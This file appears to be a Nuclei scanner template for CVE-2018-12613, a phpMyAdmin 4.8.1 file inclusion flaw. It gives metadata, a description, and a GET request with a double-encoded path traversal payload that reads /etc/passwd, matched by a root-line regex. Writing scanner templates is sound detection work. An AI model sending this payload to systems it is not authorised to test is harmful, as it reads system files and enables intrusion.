nuclei-templates/cves/2018/CVE-2018-12613.yaml

32 lines
1.3 KiB
YAML
Raw Normal View History

2021-02-20 11:58:59 +00:00
id: CVE-2018-12613
info:
name: PhpMyAdmin 4.8.1 Remote File Inclusion
author: pikpikcu
severity: high
2021-02-20 11:58:59 +00:00
reference: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613
tags: cve,cve2018,phpmyadmin,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2018-12613
cwe-id: CWE-287
description: "An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication)."
2021-02-20 11:58:59 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2021-02-20 11:58:59 +00:00
part: body
- type: status
status:
- 200